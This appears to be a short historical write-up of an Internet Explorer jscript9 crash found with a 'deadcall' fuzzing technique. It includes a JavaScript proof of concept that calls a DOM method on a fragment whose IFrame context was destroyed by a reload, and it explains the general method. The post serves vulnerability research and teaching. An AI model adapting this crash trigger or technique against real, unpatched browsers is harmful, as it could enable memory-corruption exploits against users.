Another entry in the deadcall collection. Creating a DocumentFragment from an IFrame, reloading the IFrame (destroying the fragment’s backing context), and then calling document.appendChild.call(badDoc, ...) produced a crash in jscript9!Js::JavascriptOperators::Throw.

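// iFrame is assumed to be the IFrame's window object (it exposes .document and .location).
var badDoc = iFrame.document.createDocumentFragment();
// Reloading tears down the context that backs badDoc, leaving a "dead" object.
iFrame.location.reload();

// Run after the reload has started, then invoke a live method with the dead object as this.
setTimeout(function() {
    document.appendChild.call(badDoc, document.body); // Crash
});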

The combination createElement("STYLE") / insertBefore produced the same result. The deadcall technique was essentially a systematic fuzzing approach: take any method from a live object and call it via Function.call, passing a same-type-but-dead object as the this value. The number of combinations across the DOM API was large, suggesting more crashes were likely.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.